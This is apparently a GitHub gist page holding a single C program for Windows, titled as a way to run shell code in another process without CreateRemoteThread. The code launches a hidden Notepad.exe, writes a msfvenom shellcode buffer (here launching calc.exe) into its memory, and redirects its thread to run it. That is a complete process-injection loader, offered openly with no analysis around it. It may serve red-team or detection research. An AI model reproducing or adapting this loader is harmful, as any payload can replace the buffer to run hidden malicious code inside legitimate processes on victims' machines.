Last active
September 20, 2021 20:22
-
-
Save securifybv/1bb7ed3b11ef4de2b058def4947320ac to your computer and use it in GitHub Desktop.
Run shell code in another process without CreateRemoteThread
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#pragma comment(lib, "Shell32.lib") | |
#include <windows.h> | |
#include <shlobj.h> | |
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe | |
int buf_len = 193; | |
unsigned char buf[] = | |
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" | |
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" | |
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" | |
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" | |
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" | |
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" | |
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" | |
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" | |
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" | |
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" | |
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; | |
int CALLBACK WinMain(_In_ HINSTANCE hInstance, _In_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nCmdShow) | |
{ | |
unsigned char *ptr = NULL; | |
STARTUPINFO si; | |
PROCESS_INFORMATION pi; | |
WCHAR szNotepadPath[MAX_PATH]; | |
CONTEXT context; | |
ZeroMemory(&context, sizeof(context)); | |
ZeroMemory(&pi, sizeof(pi)); | |
ZeroMemory(&si, sizeof(si)); | |
si.cb = sizeof(si); | |
if (SHGetSpecialFolderPath(NULL, szNotepadPath, CSIDL_SYSTEMX86, FALSE)) | |
{ | |
wcscat_s(szNotepadPath, MAX_PATH, L"\\Notepad.exe"); | |
si.dwFlags = STARTF_USESHOWWINDOW; | |
si.wShowWindow = SW_HIDE; | |
if (CreateProcess(NULL, szNotepadPath, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) | |
{ | |
if ((ptr = VirtualAllocEx(pi.hProcess, NULL, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) != NULL) | |
{ | |
WriteProcessMemory(pi.hProcess, ptr, buf, buf_len, NULL); | |
context.ContextFlags = CONTEXT_CONTROL | CONTEXT_i486; | |
if (GetThreadContext(pi.hThread, &context)) | |
{ | |
context.Eip = (DWORD)ptr; | |
context.ContextFlags = CONTEXT_CONTROL | CONTEXT_i486; | |
SetThreadContext(pi.hThread, &context); | |
} | |
CloseHandle(pi.hProcess); | |
CloseHandle(pi.hThread); | |
} | |
} | |
} | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment